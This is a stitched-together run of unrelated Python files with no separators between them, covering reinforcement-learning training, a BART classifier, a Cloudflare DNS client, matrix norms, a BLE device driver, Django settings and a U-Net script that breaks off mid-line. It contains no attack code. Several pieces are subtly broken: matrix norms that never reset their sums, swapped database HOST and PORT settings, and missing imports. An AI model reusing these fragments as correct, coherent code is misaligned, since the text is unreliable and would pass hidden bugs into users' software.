hard_update(agent.policy, updated_agent.policy) if args.start_steps > total_numsteps: action = env.action_space.sample() # Sample random action else: action = agent.select_action(state) # Sample action from policy act_state = state if len(memory) > args.batch_size: if (args.update_period <= 1) or ((args.update_period > 1) and (total_agent_steps % args.update_period == 0)): epochs = 1 if args.update_period <= 1: epochs = int(1.0 / args.update_period) # Number of updates per step in environment for i in range(epochs): # Update parameters of all the networks critic_1_loss, critic_2_loss, policy_loss, ent_loss, alpha = updated_agent.update_parameters(memory, args.batch_size, updates) # writer.add_scalar('loss/critic_1', critic_1_loss, updates) # writer.add_scalar('loss/critic_2', critic_2_loss, updates) # writer.add_scalar('loss/policy', policy_loss, updates) # writer.add_scalar('loss/entropy_loss', ent_loss, updates) # writer.add_scalar('entropy_temprature/alpha', alpha, updates) updates += 1 next_state, reward, done, _ = env.step(action) # Step r_buffer += reward next_state_ = next_state if (episode_steps + 1) % ac_interval == 0 or done: # Ignore the "done" signal if it comes from hitting the time horizon. # (https://github.com/openai/spinningup/blob/master/spinup/algos/sac/sac.py) mask = 1 if episode_steps + 1 == env._max_episode_steps else float(not done) memory.push(act_state, action, r_buffer, next_state_, mask) # Append transition to memory r_buffer = 0 agent_steps += 1 total_agent_steps += 1 episode_steps += 1 total_numsteps += 1 episode_reward += reward state = next_state # writer.add_scalar('reward/train', episode_reward, i_episode) print("Episode: {}, total numsteps: {}, agent steps: {}, reward: {}".format(i_episode, total_numsteps, agent_steps, round(episode_reward, 2))) updated_agent.save_model(env_name='highfreqreacher', actor_path=weights_path_actor, critic_path=weights_path_critic) save_returns(total_numsteps, episode_reward, agent_steps, returns_path) if total_numsteps > args.num_steps: break if i_episode % 10 == 0 and args.eval is True: avg_reward = 0. episodes = 10 for _ in range(episodes): state = env.reset() episode_reward = 0 done = False while not done: action = agent.select_action(state, evaluate=True) next_state, reward, done, _ = env.step(action) episode_reward += reward state = next_state avg_reward += episode_reward avg_reward /= episodes # writer.add_scalar('avg_reward/test', avg_reward, i_episode) print("----------------------------------------") print("Test Episodes: {}, Avg. Reward: {}".format(episodes, round(avg_reward, 2))) print("----------------------------------------") env.close() def save_returns(steps, ret, agent_steps, path): with open(path, 'a', encoding='utf-8') as returns_file: returns_file.write('{},{},{}\n'.format(steps, ret, agent_steps)) if __name__ == "__main__": main() 1-10 from ._titlefont import Titlefont from ._tickformatstop import Tickformatstop from ._tickfont import Tickfont from ._rangeslider import Rangeslider from plotly.graph_objs.layout.xaxis import rangeslider from ._rangeselector import Rangeselector from plotly.graph_objs.layout.xaxis import rangeselector import torch from torch.nn import CrossEntropyLoss from transformers import AutoModel, AutoConfig COLUMN_SQL_LABEL_COUNT = 563 SQL_DIFF_LABEL_COUNT = 120 class BartForContext(torch.nn.Module): config_class = AutoConfig base_model_prefix = "bart" def __init__(self, config): super(BartForContext, self).__init__() self.bart = AutoModel.from_pretrained(config) self.config = AutoConfig.from_pretrained(config) self.linear = torch.nn.Linear(self.config.hidden_size, SQL_DIFF_LABEL_COUNT) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, masked_lm_labels=None, masked_col_labels=None, masked_context_labels=None, q_tab_inds=None, is_train=True ): outputs = self.bart(input_ids=input_ids, attention_mask=attention_mask, decoder_input_ids=masked_context_labels) # [batch_size, output_length, hidden_size] context_prediction_scores = outputs[0] # [batch_size, output_length, sql_diff_label_count] context_prediction_scores = self.linear(context_prediction_scores) total_loss = None if masked_context_labels is not None: context_loss_fct = CrossEntropyLoss(ignore_index=-1) masked_context_loss = context_loss_fct( context_prediction_scores.view(-1, SQL_DIFF_LABEL_COUNT), masked_context_labels.view(-1)) if total_loss is None: total_loss = masked_context_loss else: total_loss += masked_context_loss if is_train: return total_loss else: return total_loss, context_prediction_scores import pyinotify as pyinotify from nekumo.api.base import NekumoNodeEvent, API from nekumo.utils.filesystem import path_split_unix class EventHandler(pyinotify.ProcessEvent): def __init__(self, nekumo, directory): super().__init__() self.nekumo = nekumo self.directory = directory def process_default(self, event): path = event.pathname.replace(self.directory, '') directory = path_split_unix(path)[0] action = event.maskname.replace('IN_', '').lower() # node = API(self.nekumo, path, 'info').get_instance().execute() self.nekumo.pubsub.fire(directory, NekumoNodeEvent(self.nekumo, path, action)) def init_watcher(nekumo, directory): # The watch manager stores the watches and provides operations on watches wm = pyinotify.WatchManager() notifier = pyinotify.ThreadedNotifier(wm, EventHandler(nekumo, directory)) notifier.daemon = True notifier.start() mask = pyinotify.IN_DELETE | pyinotify.IN_CREATE # watched events wdd = wm.add_watch(directory, mask, rec=True) dns_cf.py import json import requests from dns_record import DnsRecord import logging """ https://api.cloudflare.com/#dns-records-for-a-zone-list-dns-records """ session = requests.Session() session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' 'Chrome/74.0.3729.169 Safari/537.36 ', 'Content-Type': 'application/json' }) class DNSApi: def __init__(self): self.configs = { 'CF_Account_ID': None, 'CF_Zone_ID': None, 'CF_Api_Token': None, 'CF_Api_Key': None, } def get_headers(self): if self.configs['CF_Zone_ID'] is None: raise Exception('CF_Zone_ID cannot be none') if self.configs['CF_Api_Token']: return { 'Authorization': 'Bearer %s' % self.configs['CF_Api_Token'] } elif self.configs['CF_Api_Key'] and self.configs['CF_Account_ID']: return { 'X-Auth-Email': self.configs['CF_Account_ID'], 'X-Auth-Key': self.configs['CF_Api_Key'] } else: raise Exception('CF_Api_Key cannot be none or (X-Auth-Email and X-Auth-Key cannot be none)') def list(self, hostnames): logging.info('get dns record list...') api_url = "https://api.cloudflare.com/client/v4/zones/%s/dns_records" % self.configs["CF_Zone_ID"] r = requests.get(url=api_url, data="type=A&page=1&per_page=100&match=any", headers=self.get_headers()) if r.status_code != 200: logging.info('get dns record list failed') raise Exception('request error:%s(%s)' % (r.text, r.status_code)) r = r.json() records = [] if r['success']: for record in r['result']: if record['name'] in hostnames: records.append( DnsRecord(id=record['id'], type=record['type'], name=record['name'], content=record['content'], ttl=record['ttl'])) logging.info('get dns record list success, length = %s' % len(records)) return records else: logging.info('get dns record list failed') raise Exception('request error: %s' % r) def edit(self, record): logging.info('edit dns record: %s' % json.dumps(record.__dict__)) api_url = "https://api.cloudflare.com/client/v4/zones/%s/dns_records/%s" % ( self.configs["CF_Zone_ID"], record.id) data = { 'content': record.content } r = requests.patch(url=api_url, data=json.dumps(data), headers=self.get_headers()) if r.status_code != 200: logging.info('edit dns record failed') raise Exception('request error:%s(%s)' % (r.text, r.status_code)) r = r.json() if not r['success']: logging.info('edit dns record failed') raise Exception('request error: %s' % r) logging.info('edit dns record success') # chat/routing.py from django.urls import re_path from kafka_example.channels import consumers websocket_urlpatterns = [ re_path(r'example/ws/$', consumers.ExampleConsumer.as_asgi()), ] 0 import numpy as np import math def euclidiana(vetor): # norma-2 vetorial n, x = len(vetor), 0 for i in range(n): x += math.fabs(vetor[i]) ** 2 return x ** (1/2) def manhattan(vetor): # norma-1 vetorial n, x = len(vetor), 0 for i in range(n): x += math.fabs(vetor[i]) return x def p(vetor, p): #norma-p vetorial n, x = len(vetor), 0 for i in range(n): x += math.fabs(math.pow(vetor[i], p)) return x ** (1/p) def infinita(vetor): # norma-infinita vetorial n, max = len(vetor), vetor[0] for i in range(1, n): if math.fabs(vetor[i]) > max: max = math.fabs(vetor[i]) return max def frobenius(matriz_a): # norma-2 matricial n, x = len(matriz_a), 0 for i in range(n): for j in range(n): x += math.pow(math.fabs(matriz_a[i,j]), 2) return x ** (1/2) def soma_coluna(matriz_a): # norma-1 matricial n, max, x = len(matriz_a), 0, 0 for j in range(n): for i in range(n): x += math.fabs(matriz_a[i,j]) if x > max: max = x return max def soma_linha(matriz_a): # norma-infinita matricial n, max, x = len(matriz_a), 0, 0 for i in range(n): for j in range(n): x += math.fabs(matriz_a[i,j]) if x > max: max = x return max def residual(matriz_a, vetor_b, delta_x): #norma-residual matricial n, k = len(matriz_a), np.linalg.cond(matriz_a) delta_b = np.matmul(matriz_a, delta_x) vetor_r = vetor_b - delta_b vetor_x = np.ones(n) vetor_x_menos_delta_x = vetor_x - delta_x residuo_r_b = euclidiana(vetor_r)/euclidiana(vetor_b) print("Vetor residual:\n", vetor_r) print("Resíduo da solução x:", residuo_r_b) if euclidiana(vetor_x_menos_delta_x)/euclidiana(vetor_x) <= k*residuo_r_b: print("A solução encontrada é precisa.") else: print("A solução encontrada não é precisa.")import md5 input = "ugkcyxxp" def part1(): x = 0 pwd = "" print '{:_<8}'.format(pwd) while True: m = md5.new() m.update(input) m.update(str(x)) digest = m.hexdigest() if digest.startswith("00000"): pwd += digest[5:6] print '{:_<8}'.format(pwd) x += 1 if len(pwd) == 8: break return pwd def part2(): x = 0 pwd = list("_" * 8) print "".join(pwd) while True: m = md5.new() m.update(input) m.update(str(x)) digest = m.hexdigest() if digest.startswith("00000"): loc = ord(digest[5:6]) if 48 <= loc <= 55 and pwd[int(chr(loc))] == "_": pwd[int(chr(loc))] = digest[6:7] print "".join(pwd) x += 1 if "_" not in pwd: break return "".join(pwd) print "Part1: " + str(part1()) print "Part2: " + str(part2()) src/py/model/Document.py from google.appengine.ext import ndb class UserDoc(ndb.Model): user_id = ndb.StringProperty() doc_key = ndb.BlobKeyProperty() doc_lang = ndb.StringProperty() doc_ocr = ndb.TextProperty() def get_by_user(self, user_id): return UserDoc.gql("WHERE user_id = :1", user_id)NeonOcean/Environment from interactions.utils.routing import fgl_and_get_two_person_transforms_for_jig from sims4.tuning.tunable import AutoFactoryInit, HasTunableSingletonFactory, TunableReference import placement import services class SocialJigFromDefinition(AutoFactoryInit, HasTunableSingletonFactory): FACTORY_TUNABLES = {'jig_definition': TunableReference(description='\n The jig to use for finding a place to do the social.\n ', manager=services.definition_manager())} def get_transforms_gen(self, actor, target, actor_slot_index=0, target_slot_index=1, stay_outside=False, fallback_routing_surface=None, **kwargs): (actor_transform, target_transform, routing_surface) = fgl_and_get_two_person_transforms_for_jig(self.jig_definition, actor, actor_slot_index, target, target_slot_index, stay_outside, fallback_routing_surface=fallback_routing_surface, **kwargs) yield (actor_transform, target_transform, routing_surface, ()) def get_footprint_polygon(self, sim_a, sim_b, sim_a_transform, sim_b_transform, routing_surface): return placement.get_placement_footprint_compound_polygon(sim_b_transform.translation, sim_b_transform.orientation, routing_surface, self.jig_definition.get_footprint(0)) # 5! = 120: # # 5 * 4 * 3 * 2 * 1 def factorial(n): if n == 1: return 1 return n * factorial(n - 1) print("5!={:,}, 3!={:,}, 11!={:,}".format( factorial(5), # 120 factorial(3), # 6 factorial(11) # HUGE )) # Fibonacci numbers: # 1, 1, 2, 3, 5, 8, 13, 21, ... def fibonacci(limit): nums = [] current = 0 next = 1 while current < limit: current, next = next, next + current nums.append(current) return nums print('via lists') for n in fibonacci(100): print(n, end=', ') print() def fibonacci_co(): current = 0 next = 1 while True: current, next = next, next + current yield current print('with yield') for n in fibonacci_co(): if n > 1000: break print(n, end=', ') mami-project/lurk # pylint: disable = line-too-long, multiple-statements, missing-module-attribute, print-statement """https://bitbucket.org/logilab/pylint/issue/111/false-positive-used-before-assignment-with""" try: raise IOError(1, "a") except IOError as err: print(err) 1-10 from . import profile_get_renamed_variables if __name__ == '__main__': profile_get_renamed_variables() # Generated by Django 4.0.4 on 2022-05-18 10:40 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('gasolinapp', '0001_initial'), ] operations = [ migrations.AlterField( model_name='gasolinera', name='location', field=models.CharField(max_length=100), ), migrations.AlterField( model_name='gasolinera', name='schedule', field=models.CharField(max_length=100), ), ] def FindDifference(word): letters = list("programmer") i = 0 j = 0 while i < len(word) and j < len(letters): if word[i] == letters[j]: j+=1 i+=1 start = i - 1 if i == len(word): return -1 i = len(word) j = len(letters) while i > 0 and j > 0: i -= 1 if word[i] == letters[j - 1]: j-=1 end = i return end - start - 1 if __name__ == '__main__': print(FindDifference("progxrammerrxproxgrammer"))import codecademylib from matplotlib import pyplot as plt unit_topics = ['Limits', 'Derivatives', 'Integrals', 'Diff Eq', 'Applications'] num_hardest_reported = [1, 3, 10, 15, 1] #Make your plot here plt.figure(figsize=(10,8)) plt.pie(num_hardest_reported, labels=unit_topics, autopct="%1d%%") plt.axis('equal') plt.title('Hardest Topics') plt.show() plt.savefig("my_pie_chart.png") # -*- coding: utf-8 -*- """ Package containing the implementation of the tools of the Multidimensional Supplemental Tools. This package contains both the high level implementation of the tools as well as the lower level code implementing the tools. """ from keyword import * from keywords import * from math import * from . import netcdf from constants import * from ordered_set import * import functools import logging import time from pygatt import BLEDevice, exceptions from . import constants from .bgapi import BGAPIError from .error_codes import ErrorCode from .packets import BGAPICommandPacketBuilder as CommandBuilder from .bglib import EventPacketType, ResponsePacketType log = logging.getLogger(__name__) def connection_required(func): """Raise an exception if the device is not connected before calling the actual function. """ @functools.wraps(func) def wrapper(self, *args, **kwargs): if self._handle is None: raise exceptions.NotConnectedError() return func(self, *args, **kwargs) return wrapper class BGAPIBLEDevice(BLEDevice): def __init__(self, address, handle, backend): super(BGAPIBLEDevice, self).__init__(address) self._handle = handle self._backend = backend @connection_required def bond(self, permanent=False): """ Create a bond and encrypted connection with the device. """ # Set to bondable mode so bonds are store permanently if permanent: self._backend.set_bondable(True) log.debug("Bonding to %s", self._address) self._backend.send_command( CommandBuilder.sm_encrypt_start( self._handle, constants.bonding['create_bonding'])) self._backend.expect(ResponsePacketType.sm_encrypt_start) packet_type, response = self._backend.expect_any( [EventPacketType.connection_status, EventPacketType.sm_bonding_fail]) if packet_type == EventPacketType.sm_bonding_fail: raise BGAPIError("Bonding failed") log.info("Bonded to %s", self._address) @connection_required def get_rssi(self): """ Get the receiver signal strength indicator (RSSI) value from the device. Returns the RSSI as in integer in dBm. """ # The BGAPI has some strange behavior where it will return 25 for # the RSSI value sometimes... Try a maximum of 3 times. for i in range(0, 3): self._backend.send_command( CommandBuilder.connection_get_rssi(self._handle)) _, response = self._backend.expect( ResponsePacketType.connection_get_rssi) rssi = response['rssi'] if rssi != 25: return rssi time.sleep(0.1) raise BGAPIError("get rssi failed") @connection_required def char_read(self, uuid, timeout=None): return self.char_read_handle(self.get_handle(uuid), timeout=timeout) @connection_required def char_read_handle(self, handle, timeout=None): log.info("Reading characteristic at handle %d", handle) self._backend.send_command( CommandBuilder.attclient_read_by_handle( self._handle, handle)) self._backend.expect(ResponsePacketType.attclient_read_by_handle) success = False while not success: matched_packet_type, response = self._backend.expect_any( [EventPacketType.attclient_attribute_value, EventPacketType.attclient_procedure_completed], timeout=timeout) # TODO why not just expect *only* the attribute value response, # then it would time out and raise an exception if allwe got was # the 'procedure completed' response? if matched_packet_type != EventPacketType.attclient_attribute_value: raise BGAPIError("Unable to read characteristic") if response['atthandle'] == handle: # Otherwise we received a response from a wrong handle (e.g. # from a notification) so we keep trying to wait for the # correct one success = True return bytearray(response['value']) @connection_required def char_read_long(self, uuid, timeout=None): return self.char_read_long_handle(self.get_handle(uuid), timeout=timeout) @connection_required def char_read_long_handle(self, handle, timeout=None): log.info("Reading long characteristic at handle %d", handle) self._backend.send_command( CommandBuilder.attclient_read_long( self._handle, handle)) self._backend.expect(ResponsePacketType.attclient_read_long) success = False response = b"" while not success: matched_packet_type, chunk = self._backend.expect_any( [EventPacketType.attclient_attribute_value, EventPacketType.attclient_procedure_completed], timeout=timeout) if (matched_packet_type == EventPacketType.attclient_attribute_value): if chunk['atthandle'] == handle: # Concatenate the data response += chunk["value"] elif (matched_packet_type == EventPacketType.attclient_procedure_completed): if chunk['chrhandle'] == handle: success = True return bytearray(response) @connection_required def char_write_handle(self, char_handle, value, wait_for_response=True): while True: value_list = [b for b in value] # An "attribute write" is always acknowledged by the remote host. if wait_for_response: self._backend.send_command( CommandBuilder.attclient_attribute_write( self._handle, char_handle, value_list)) self._backend.expect( ResponsePacketType.attclient_attribute_write) packet_type, response = self._backend.expect( EventPacketType.attclient_procedure_completed, # According to the BLE spec, the device has 30 seconds to # repsonse to the attribute write. timeout=30) # A "command" write is unacknowledged - don't wait for a response. else: self._backend.send_command( CommandBuilder.attclient_write_command( self._handle, char_handle, value_list)) packet_type, response = self._backend.expect( ResponsePacketType.attclient_write_command) if (response['result'] != ErrorCode.insufficient_authentication.value): # Continue to retry until we are bonded break # ASC - adapted from # https://raw.githubusercontent.com/mjbrown/bgapi/master/bgapi/module.py # - reliable_write_by_handle @connection_required def char_write_long_handle(self, char_handle, value, wait_for_response=False): maxv = 18 for i in range(int(((len(value)-1) / maxv)+1)): chunk = value[maxv*i:min(maxv*(i+1), len(value))] value_list = [b for b in chunk] self._backend.send_command( CommandBuilder.attclient_prepare_write( self._handle, char_handle, maxv*i, value_list)) packet_type, response = self._backend.expect( ResponsePacketType.attclient_prepare_write) packet_type, response = self._backend.expect( EventPacketType.attclient_procedure_completed) time.sleep(0.1) time.sleep(0.1) self._backend.send_command( CommandBuilder.attclient_execute_write( self._handle, 1)) # 1 = commit, 0 = cancel self._backend.expect(ResponsePacketType.attclient_execute_write) packet_type, response = self._backend.expect( EventPacketType.attclient_procedure_completed) time.sleep(0.1) @connection_required def disconnect(self): log.debug("Disconnecting from %s", self._address) self._backend.send_command( CommandBuilder.connection_disconnect(self._handle)) self._backend.expect(ResponsePacketType.connection_disconnect) log.info("Disconnected from %s", self._address) self._handle = None @connection_required def discover_characteristics(self): self._characteristics = self._backend.discover_characteristics( self._handle) return self._characteristics thomasgas/cta-lstchainlstchain/mc/tests/test_mc.py import numpy as np from lstchain.mc import ( power_law_integrated_distribution, int_diff_sp, rate, weight ) def test_integrated_distribution(): emin = 50. # u.GeV emax = 500.e3 # u.GeV nevents = 1e6 spectral_index = -2.5 bins = 30 b , y = power_law_integrated_distribution( emin, emax, nevents, spectral_index, bins) np.testing.assert_allclose(nevents,np.sum(y),rtol=1.e-10) def test_diff_sp(): emin = 30. # u.GeV emax = 100.e3 # u.GeV spectral_index = -2. e0 = 1000. # u.GeV integral_e = int_diff_sp(emin, emax, spectral_index, e0) np.testing.assert_allclose(integral_e, 33323, rtol=1e-3) def test_rate(): emin = 20. # u.GeV emax = 300.e3 # u.GeV spectral_index = -3. e0 = 300. # u.GeV area = 1.e9 cone = 0 norm = 1.e-11 np.testing.assert_allclose(rate(emin, emax, spectral_index, cone, area, norm, e0), 337.5, rtol=1e-3) def test_weight(): emin = 10. # u.GeV emax = 50.e3 # u.GeV sim_sp_idx = -2. w_sp_idx = -2.6 e0 = 1000. # u.GeV rate = 8. nev = 1.e6 np.testing.assert_allclose(weight(emin, emax, sim_sp_idx, w_sp_idx, rate, nev, e0), 8.07e-7, rtol=1e-3) flipper/slackwrapper.py from slackclient import SlackClient __all__ = [ 'SlackWrapper', ] class SlackWrapper(object): def __init__(self, slack_client=None, botid=None, token=None): self._slack_client = slack_client self.botid = botid self.token = token def connect(self): self._slack_client = SlackClient(self.token) return self._slack_client.rtm_connect() def rtm_read(self): return self._slack_client.rtm_read() def post(self, channel, message): self._slack_client.api_call( "chat.postMessage", channel=channel, text=message, as_user=True ) class Node(object): __slots__ = ('value', 'prev', 'next') def __init__(self, value=None, prev=None, next=None): self.value, self.prev, self.next = value, prev, next class CircularDoubleLinkedList(object): """循环双端链表 ADT 循环就是把root的prev指向tail节点,串起来 """ def __init__(self, maxsize=None): self.maxsize = maxsize node = Node() node.next, node.prev = node, node self.root = node self.length = 0 def __len__(self): return self.length def headnode(self): return self.root.next def tailnode(self): return self.root.prev def append(self, value): if self.maxsize is not None and len(self) >= self.maxsize: # 先看看插入的链表是否已满 raise Exception('LinkedList is full.') node = Node(value=value) tailnode = self.tailnode() tailnode.next = node node.prev = tailnode node.next = self.root self.root.prev = node self.length += 1 def appendleft(self, value): if self.maxsize is not None and len(self) >= self.maxsize: raise Exception('LinkedList is full.') node = Node(value=value) headnode = self.headnode() self.root.next = node node.prev = self.root node.next = headnode headnode.prev = node self.length += 1 def remove(self, node): """remove :param node: 传入node 而不是 value 我们就能实现 O(1) 删除 :return: """ if node is self.root: return else: node.prev.next = node.next node.next.prev = node.prev self.length -= 1 return node def iter_node(self): if self.root.next is self.root: return curnode = self.root.next while curnode.next is not self.root: yield curnode curnode = curnode.next yield curnode def __iter__(self): for node in self.iter_node(): yield node.value def iter_node_reverse(self): """相比单链表独有的反序遍历""" if self.root.prev is self.root: return curnode = self.root.prev while curnode.prev is not self.root: yield curnode curnode = curnode.prev yield curnode class DoubleEndedQueue(CircularDoubleLinkedList): def pop(self): if self.tailnode() is self.root: raise Exception('LinkedList is empty.') tailnode = self.tailnode() value = tailnode.value self.remove(tailnode) return value def popleft(self): if self.headnode() is self.root: raise Exception('LinkedList is empty.') headnode = self.headnode() value = headnode.value self.remove(headnode) return value class Stack: def __init__(self): self.deque = DoubleEndedQueue() def push(self, value): return self.deque.append(value) def pop(self): return self.deque.pop() def __len__(self): return len(self.deque) def is_empty(self): return len(self.deque) == 0 def test_stack(): s = Stack() for i in range(3): s.push(i) assert len(s) == 3 assert s.pop() == 2 assert s.pop() == 1 assert s.pop() == 0 assert s.is_empty() import pytest with pytest.raises(Exception) as excinfo: s.pop() assert 'empty' in str(excinfo.value) 1-10 """ Django settings for src project. Generated by 'django-admin startproject' using Django 3.1.1. For more information on this file, see https://docs.djangoproject.com/en/3.1/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.1/ref/settings/ """ import os from pathlib import Path # Build paths inside the project like this: BASE_DIR / 'subdir'. BASE_DIR = Path(__file__).resolve().parent.parent # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.environ.get("SECRET_KEY") # SECURITY WARNING: don't run with debug turned on in production! DEBUG = os.environ.get("DEBUG") ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', # rest framework. "rest_framework", "rest_framework.authtoken", # Apps. "accounts", "products", "kits" ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'src.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'src.wsgi.application' # Database # https://docs.djangoproject.com/en/3.1/ref/settings/#databases # https://nesdis.github.io/djongo/ DATABASE_PASSWORD = os.environ.get("DATABASE_PASSWORD", None) DATABASE_USER = os.environ.get("DATABASE_USER", None) DATABASE_HOST = os.environ.get("DATABASE_HOST", None) DATABASE_PORT = os.environ.get("DATABASE_PORT", None) default_database_configuration = { 'ENGINE': 'djongo', 'NAME': os.environ.get("DATABASE_NAME"), } if DATABASE_PASSWORD is not None: default_database_configuration["PASSWORD"] = DATABASE_PASSWORD if DATABASE_USER is not None: default_database_configuration["USER"] = DATABASE_USER if DATABASE_PORT is not None: default_database_configuration["HOST"] = DATABASE_HOST if DATABASE_HOST is not None: default_database_configuration["PORT"] = DATABASE_PORT DATABASES = { 'default': default_database_configuration } # Password validation # https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # AUTH USER MODEL AUTH_USER_MODEL = "accounts.User" # Internationalization # https://docs.djangoproject.com/en/3.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.1/howto/static-files/ STATIC_URL = '/static/' REST_FRAMEWORK = { 'DEFAULT_PERMISSION_CLASSES': [ 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly' ], 'DEFAULT_AUTHENTICATION_CLASSES': [ 'rest_framework_simplejwt.authentication.JWTAuthentication', ], 'DEFAULT_FILTER_BACKENDS': [ 'django_filters.rest_framework.DjangoFilterBackend' ] } APPEND_SLASH = False #!/usr/bin/env python # coding: utf-8 #

CREATION DU DATASET

from __future__ import absolute_import, division, print_function, unicode_literals import scipy from scipy.ndimage import zoom, center_of_mass import tensorflow as tf import skimage.io as io import skimage.transform as trans from tensorflow import keras from tensorflow.keras import Model from tensorflow.keras.models import Sequential from tensorflow.keras.layers import * from tensorflow.keras.models import * from tensorflow.keras.optimizers import * from tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler from tensorflow.keras.preprocessing.image import ImageDataGenerator import tensorflow.keras.backend as K import pydicom as dicom from PIL import Image DSMASKS= r"J:\IA\ODIASP2\Dataset\Maskspng" DSIMAGES= r"J:\IA\ODIASP2\Dataset\Imagespng" BATCH_SIZE = 2 EPOCHS = 10 TARGETSIZE = (512,512) import imageio NAME = r"158373.dcm.npy.png" MASK = os.path.join(r"J:\IA\ODIASP2\Dataset\Maskspng\Dossier",NAME) IMAGE = os.path.join(r"J:\IA\ODIASP2\Dataset\Imagespng\Dossier",NAME) #lecture image -> numpy masque=imageio.imread(MASK) image=imageio.imread(IMAGE) print(type(masque), np.shape(masque)) masque = masque[np.newaxis,:,:,np.newaxis] image = image[np.newaxis,:,:,np.newaxis] data_gen_args = dict(rotation_range=30., horizontal_flip = True, #vertical_flip = True, width_shift_range=0.2, height_shift_range=0.2, zoom_range=0.3, fill_mode = 'nearest', validation_split = 0.1, #0.15 rescale = 1/255. #samplewise_center=True, ) image_datagen = ImageDataGenerator(**data_gen_args) mask_datagen = ImageDataGenerator(**data_gen_args) seed = 20 image_datagen.fit(image, augment=True, seed=seed) mask_datagen.fit(masque, augment=True, seed=seed) image_generator = image_datagen.flow_from_directory(DSIMAGES, class_mode=None, color_mode = "grayscale", subset = "training", target_size=TARGETSIZE, batch_size=BATCH_SIZE, seed=seed) mask_generator = mask_datagen.flow_from_directory(DSMASKS, class_mode=None, color_mode = "grayscale", subset = "training", target_size=TARGETSIZE, batch_size=BATCH_SIZE, seed=seed) image_generator_val = image_datagen.flow_from_directory(DSIMAGES, class_mode=None, color_mode = "grayscale", subset = "validation", target_size=TARGETSIZE, batch_size=BATCH_SIZE, seed=seed) mask_generator_val = mask_datagen.flow_from_directory(DSMASKS, class_mode=None, color_mode = "grayscale", subset = "validation", target_size=TARGETSIZE, batch_size=BATCH_SIZE, seed=seed) train_generator = zip(image_generator, mask_generator) val_generator = zip(image_generator_val, mask_generator_val) #strategie multiGPU strategy = tf.distribute.MirroredStrategy(devices=["/gpu:0", "/gpu:1"], cross_device_ops=tf.distribute.HierarchicalCopyAllReduce()) print("Num GPUs Available: ", len(tf.config.experimental.list_physical_devices('GPU'))) """ loss avec des poids, que j'utilise """ #https://stackoverflow.com/questions/60253082/weighting-samples-in-multiclass-image-segmentation-using-keras def balanced_cross_entropy(beta): def convert_to_logits(y_pred): y_pred = tf.clip_by_value(y_pred, tf.keras.backend.epsilon(), 1 - tf.keras.backend.epsilon()) return tf.math.log(y_pred / (1 - y_pred)) def loss(y_true, y_pred): y_pred = convert_to_logits(y_pred) pos_weight = beta / (1 - beta) loss = tf.nn.weighted_cross_entropy_with_logits(logits=y_pred, labels=y_true, pos_weight=pos_weight) return tf.math.reduce_mean(loss * (1 - beta)) return loss def unet( pretrained_weights = None, input_size = (512,512,1) ): inputs = Input(input_size) initial = 96 initx2 = initial * 2 initx4 = initx2 * 2 initx8 = initx4 * 2 initx16 = initx8 * 2 conv1 = Conv2D(initial, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(inputs) conv1 = Conv2D(initial, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv1) pool1 = MaxPooling2D(pool_size=(2, 2))(conv1) conv2 = Conv2D(initx2, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(pool1) conv2 = Conv2D(initx2, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv2) pool2 = MaxPooling2D(pool_size=(2, 2))(conv2) conv3 = Conv2D(initx4, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(pool2) conv3 = Conv2D(initx4, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv3) pool3 = MaxPooling2D(pool_size=(2, 2))(conv3) conv4 = Conv2D(initx8, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(pool3) conv4 = Conv2D(initx8, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv4) drop4 = Dropout(0.5)(conv4) pool4 = MaxPooling2D(pool_size=(2, 2))(drop4) conv5 = Conv2D(initx16, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(pool4) conv5 = Conv2D(initx16, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv5) drop5 = Dropout(0.5)(conv5) up6 = Conv2D(initx8, 2, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(drop5)) merge6 = concatenate([drop4,up6], axis = 3) conv6 = Conv2D(initx8, 3, activation = 'selu', padding = 'same', kernel_initializer 